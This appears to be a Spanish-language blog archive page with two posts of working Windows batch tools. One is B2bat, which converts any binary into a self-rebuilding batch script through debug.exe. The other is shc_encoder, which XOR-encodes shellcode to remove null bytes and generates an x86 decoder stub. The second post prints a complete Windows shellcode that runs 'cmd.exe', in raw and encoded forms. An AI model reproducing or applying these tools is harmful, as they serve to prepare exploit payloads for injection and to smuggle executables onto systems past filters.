Archivo para la Herramientas categoría

:B2Bat (conversor de cualquier archivo a .bat)

Publicado en Herramientas con etiquetas , , , , , , , , , el Septiembre 12, 2009 por lShadowl
Código:
:: B2bat (binary to bat)
:: Author: lShadowl;The Shadow
:: Realese date:24/8/09
:: Realese version:1.0
:: Tested in Win Xp pro sp3
:: File size limit: 64kB
:: Info: Converts any file into a batch script.
:: Syntax: b2b <in file> <out script>

       @echo off
:b2b
setlocal enabledelayedexpansion&& set ms=%2&& set mos=%1
if not defined ms (echo Syntax: b2b ^<in file^> ^<out script^>&& goto:eof) else (echo.Working...)
echo.exit|cmd/K prompt $_rcx$_$_q>$
echo set cx=%%1>CX.bat
debug %1<$ | find "CX">_.bat&& call _
set/a ecx=0x100+0x%cx%
set hexstr=0123456789ABCDEF&& set sz=
:loop2
set/a ths=%ecx% %% 16
call :evals %%hexstr:~%ths%,1%%
if /I %ecx% GEQ 16 (set /A ecx=%ecx%/16&& goto:loop2) else (goto:kg)
:evals
set sz=%1%sz%&& goto:eof
:kg
echo.exit|cmd/K prompt $_d 100 %sz%$_q>$
type $ | debug %1>$.t
(echo set ff=createobject("scripting.filesystemobject"^)&& echo set rr=ff.opentextfile("$.t",1^)&& echo aa = rr.readall
echo rr.close&& echo r1 = Replace(aa,">",""^)&& echo r2 = Replace(r1,"<",""^)&& echo r3 = Replace(r2,"&",""^)
echo r4 = Replace(r3,"|",""^)&& echo set bb=ff.opentextfile("$.t",2^)&& echo bb.write r4)>rp.vbs&& rp.vbs
for /f "tokens=1,* delims=]" %%A in ('"type $.t|find /n /v """') do (set "current=%%B"

    if defined current (call set current=!!current:-= !!&& echo !current!>>$) else echo.>>$)
echo.exit|cmd/K prompt $_::Script by B2bat - B2bat by lShadowl$_       @echo off$_($_echo n b2bat.>%ms%
for /f "tokens=* skip=7 delims=%%a" %%a in ($) do (set csl=%%a&& echo echo e!csl:~5,53!>>%ms%)
:brk
echo exit|cmd/K prompt $_echo.$_echo rcx$_echo %sz%$_echo w$_echo q$_echo.$_)$Gda.t$A$A rem >>%ms%
echo.exit|cmd/K prompt $_debug$Lda.t$Gnul$_ren b2bat.exi %mos%$A$A rem >>%ms%
echo.Done.
goto:eof

Ejemplo:

>b2b tongue.gif tongue.bat

Resultante:

Código:
::Script by B2bat - B2bat by lShadowl
       @echo off
(
echo n b2bat.exit
echo e0100  47 49 46 38 39 61 0F 00 0F 00 D5 00 00 00 00 00
echo e0110  CC 99 00 70 66 00 52 42 00 66 66 66 EE E1 00 EC
echo e0120  D1 00 E8 BA 00 B0 69 00 23 1C 00 D6 9C 00 FF 00
echo e0130  00 86 86 86 BF A6 00 68 54 00 11 00 00 FF D6 00
echo e0140  FF FF 00 FF F8 00 32 28 00 FF E6 00 C5 9E 00 73
echo e0150  5C 00 11 10 00 26 23 00 7F 71 00 81 37 00 F0 B5
echo e0160  00 F5 C4 00 3C 00 00 CC A3 00 51 48 00 FF CC 00
echo e0170  FF F0 00 7E 6A 00 C1 74 00 E2 C8 00 C7 B3 00 FF
echo e0180  DD 00 62 5A 00 D0 B4 00 80 73 00 59 47 00 1B 16
echo e0190  00 33 33 00 EC BD 00 80 69 00 08 00 00 18 00 00
echo e01A0  7F 7C 00 56 51 00 6D 57 00 CC 99 00 E0 9E 00 79
echo e01B0  61 00 F8 CE 00 99 99 99 00 00 00 00 00 00 00 00
echo e01C0  00 00 00 00 00 00 00 00 00 00 00 00 00 21 F9 04
echo e01D0  05 14 00 38 00 2C 00 00 00 00 0F 00 0F 00 00 06
echo e01E0  A3 40 9C 10 47 18 5C 00 97 0F 61 38 64 4C 56 22
echo e01F0  94 A1 24 C0 B0 18 CD 8B E3 66 32 51 42 A1 C2 E9
echo e0200  82 C5 4D 2C 20 88 F7 2B 69 CB 58 C4 04 27 BD 6E
echo e0210  47 24 85 4B D1 06 02 89 00 19 21 29 00 31 12 21
echo e0220  27 1F 17 1E 7D 00 8D 14 8D 00 60 25 47 73 20 2E
echo e0230  00 22 14 83 29 14 14 24 48 8B 7D 10 10 01 26 01
echo e0240  0A 14 26 0D 17 03 68 20 8D 0F 00 2F 00 08 5D 32
echo e0250  03 04 72 7D 20 23 0F 0B 1D 1A 10 2D 7A 66 0E 95
echo e0260  1B 0F 30 00 23 20 2A 13 42 0C AC BB 35 23 35 07
echo e0270  2A 64 4D 13 17 33 15 2D 01 33 2B 13 65 4C 45 47
echo e0280  AC 4B 43 41 00 3B 85
echo et

echo.
echo rcx
echo 286
echo w
echo q
echo.
)>da.t&& rem exit

debug<da.t>nul
ren b2bat.exi tongue.gif&& rem exit

Saludos!

Deja un Comentario »

: shc_encoder (Codificador de shellcodes)

Publicado en Herramientas con etiquetas , , , , , el Septiembre 12, 2009 por lShadowl
Código:
:: shc_encoder (Codificador de shellcodes)
:: Autor: lShadowl; The Shadow
:: Fecha de realizacion: 07/08/09
:: Caracteristicas:
::	-Utiliza el metodo xor para encriptar.
:: 	-Proporciona el codigo fuente (en asm) para crear la rutina decodificadora correspondiente.
::	-Identifica la existencia de bytes nulos y saltos de linea.
::	-Cambia el metodo de encriptacion si es necesario para que no existan bytes nulos o saltos de linea.
:: Limitaciones:
::	-Tama?o maximo de la shellcode de entrada: 61423 bytes
::	-Formato de la shellcode de entrada: \x<byte en hexadecimal>. Ejemplo: \xc7\xe2\xf0\x52
@echo off
setlocal enabledelayedexpansion
if '%1==' (goto:err)
if exist %1 (for /f "delims=" %%a in (%1) do set shellcode=%%a) else (goto:err)
echo =Shellcode original: %shellcode%
set hexstr=0123456789abcdef&& set xor_value=9

:encode
set sc_sz=0&& set i=2&& set/a xor_value+=0x01&& set encoded_shellcode=
echo =^>  Codificando Opcodes (xor 0x%xor_value%)...
:encode_loop
set current_byte=!shellcode:~%i%,2!&& set encodedbyte_hex=
if %current_byte%'==' (goto:test)
set/a encoded_byte=0x%current_byte%^^0x%xor_value%
call:d2h %encoded_byte%
if /i %hex:~-2% lss 10 set hex=0%hex:~-2%
set encoded_shellcode=%encoded_shellcode%\x%hex:~-2%
set/a i+=4&& goto:encode_loop

:test
echo =Shellcode codificada: %encoded_shellcode%
echo =^>  Moviendo shellcode codificada a sc.shellcode...
echo %encoded_shellcode%>sc.shellcode
echo =^>  Buscando bytes nulos y saltos de linea en sc.shellcode...
for %%a in (\x00 \x0d\x0a) do (type sc.shellcode|find "%%a">nul
	if !errorlevel!==0 (echo =^<    %%a encontrado con: xor 0x%xor_value%
		goto:encode))

:len_loop
set var=!shellcode:~%sc_sz%,1!
if %var%'==' goto:build_decoder
set/a sc_sz+=1
goto:len_loop

:build_decoder
echo =^>  Creando codigo fuente del stub decodificador...
set/a sc_sz/=4
set/a sc_sz+=0x1010
call:d2h %sc_sz%
echo ****************%hex: =%%xor_value%_decoder.asm********
(echo [BITS 32]
echo global ini
echo ini:
echo 	jmp short sc_data
echo decode_routine:
echo   	pop ebx
echo 	xor ecx,ecx
echo 	mov cx, 0x%hex: =%
echo 	sub cx, 0x1010
echo decode_loop:
echo 	xor byte [ebx], 0x%xor_value%
echo 	inc ebx
echo 	loop decode_loop
echo 	jmp short shellcode
echo sc_data:
echo 	call decode_routine
echo shellcode:)>%hex: =%%xor_value%_decoder.asm
type %hex: =%%xor_value%_decoder.asm&& echo *****************************************
echo =Codigo del decodificador guardado en %hex: =%%xor_value%_decoder.asm

echo.&& echo ^>Proceso finalizado^<

goto:eof
:err
echo Uso: shc_encoder.bat ^<shellcode^>&& goto:eof

:d2h
set dec=%1&& set hex=
:loop
set/a ths=%dec% %% 16
call :evals %%hexstr:~%ths%,1%%
if /I %dec% GEQ 16 (set /A dec=%dec%/16) else (goto:EOF)
goto:loop
:evals
set hex=%1%hex: =%&& goto:EOF

El codigo esta bastante entendible con etiquetas explicativas y los mensajes de salida del proceso.

Aqui una captura de salida del script trabajando:

Cita:
=Shellcode original:

\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x 8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f \xb7\x4a\x26\x31\xff\x31

\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\x c7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0 \x8b\x40\x78\x85\xc0\x74

\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\x e3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac \xc1\xcf\x0d\x01\xc7\x38

\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x 8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01 \xd3\x8b\x04\x8b\x01\xd0

\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x 58\x5f\x5a\x8b\x12\xeb\x86\x5d\xe9\x0e\x00\x00\x00 \x68\x31\x8b\x6f\x87\xff

\xd5\x68\xf0\xb5\xa2\x56\xff\xd5\xe8\xed\xff\xff\x ff\x63\x6d\x64\x2e\x65\x78\x65\x20\x00

=> Codificando Opcodes (xor 0×10)…

=Shellcode codificada:

\xec\xf8\x99\x10\x10\x10\x70\x99\xf5\x21\xc2\x74\x 9b\x42\x20\x9b\x42\x1c\x9b\x42\x04\x9b\x62\x38\x1f \xa7\x5a\x36\x21\xef\x21

\xd0\xbc\x2c\x71\x6c\x12\x3c\x30\xd1\xdf\x1d\x11\x d7\xf2\xe0\x42\x47\x9b\x42\x00\x9b\x52\x2c\x11\xc0 \x9b\x50\x68\x95\xd0\x64

\x5a\x11\xc0\x40\x9b\x58\x08\x9b\x48\x30\x11\xc3\x f3\x2c\x59\x9b\x24\x9b\x11\xc6\x21\xef\x21\xd0\xbc \xd1\xdf\x1d\x11\xd7\x28

\xf0\x65\xe4\x13\x6d\xe8\x2b\x6d\x34\x65\xf2\x48\x 9b\x48\x34\x11\xc3\x76\x9b\x1c\x5b\x9b\x48\xc\x11\ xc3\x9b\x14\x9b\x11\xc0\

x99\x54\x34\x34\x4b\x4b\x71\x49\x4a\x41\xef\xf0\x4 8\x4f\x4a\x9b\x02\xfb\x96\x4d\xf9\x1e\x10\x10\x10\ x78\x21\x9b\x7f\x97\xef\

xc5\x78\xe0\xa5\xb2\x46\xef\xc5\xf8\xfd\xef\xef\xe f\x73\x7d\x74\x3e\x75\x68\x75\x30\x10

=> Moviendo shellcode codificada a sc.shellcode…

=> Buscando bytes nulos y saltos de linea en sc.shellcode…

=< \x00 encontrado con: xor 0×10

=> Codificando Opcodes (xor 0×11)…

=Shellcode codificada:

\xed\xf9\x98\x11\x11\x11\x71\x98\xf4\x20\xc3\x75\x 9a\x43\x21\x9a\x43\x1d\x9a\x43\x05\x9a\x63\x39\x1e \xa6\x5b\x37\x20\xee\x20

\xd1\xbd\x2d\x70\x6d\x13\x3d\x31\xd0\xde\x1c\x10\x d6\xf3\xe1\x43\x46\x9a\x43\x01\x9a\x53\x2d\x10\xc1 \x9a\x51\x69\x94\xd1\x65

\x5b\x10\xc1\x41\x9a\x59\x09\x9a\x49\x31\x10\xc2\x f2\x2d\x58\x9a\x25\x9a\x10\xc7\x20\xee\x20\xd1\xbd \xd0\xde\x1c\x10\xd6\x29

\xf1\x64\xe5\x12\x6c\xe9\x2a\x6c\x35\x64\xf3\x49\x 9a\x49\x35\x10\xc2\x77\x9a\x1d\x5a\x9a\x49\xd\x10\ xc2\x9a\x15\x9a\x10\xc1\

x98\x55\x35\x35\x4a\x4a\x70\x48\x4b\x40\xee\xf1\x4 9\x4e\x4b\x9a\x03\xfa\x97\x4c\xf8\x1f\x11\x11\x11\ x79\x20\x9a\x7e\x96\xee\

xc4\x79\xe1\xa4\xb3\x47\xee\xc4\xf9\xfc\xee\xee\xe e\x72\x7c\x75\x3f\x74\x69\x74\x31\x11

=> Moviendo shellcode codificada a sc.shellcode…

=> Buscando bytes nulos y saltos de linea en sc.shellcode…

=> Creando codigo fuente del stub decodificador…

****************10c111_decoder.asm********

[BITS 32]

global ini

ini:

jmp short sc_data

decode_routine:

pop ebx

xor ecx,ecx

mov cx, 0×10c1

sub cx, 0×1010

decode_loop:

xor byte [ebx], 0×11

inc ebx

loop decode_loop

jmp short shellcode

sc_data:

call decode_routine

shellcode:

*****************************************

=Codigo del decodificador guardado en 10c111_decoder.asm

>Proceso finalizado<

Saludos!

Deja un Comentario »